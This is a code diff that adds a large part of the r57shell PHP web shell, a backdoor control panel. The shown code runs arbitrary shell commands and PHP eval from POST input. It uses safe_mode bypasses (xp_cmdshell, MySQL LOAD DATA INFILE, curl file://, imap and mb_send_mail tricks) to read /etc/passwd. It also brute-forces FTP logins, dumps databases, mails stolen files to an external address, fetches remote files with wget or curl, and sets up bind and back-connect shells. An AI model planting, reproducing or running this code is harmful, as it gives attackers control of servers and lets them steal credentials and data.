+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function up_down($id)
+ {
+ global $lang;
+ global $language;
+ return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
+ }
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text777'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text888'].$arrow."</b>",in('text','u1p',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text7777'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text8888'].$arrow."</b>",in('text','Mohajer22',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text999'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text9999'].$arrow."</b>","<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','string',60,(($_POST['string'])?($_POST['string']):("/etc/passwd"))).ws(2)."<b>".in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text1010'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text101010'].$arrow."</b>","<select name=plugin><option>cat /etc/passwd</option><option>/bin/ls</option><option>tempnam</option><option>/tmp</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):(""))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
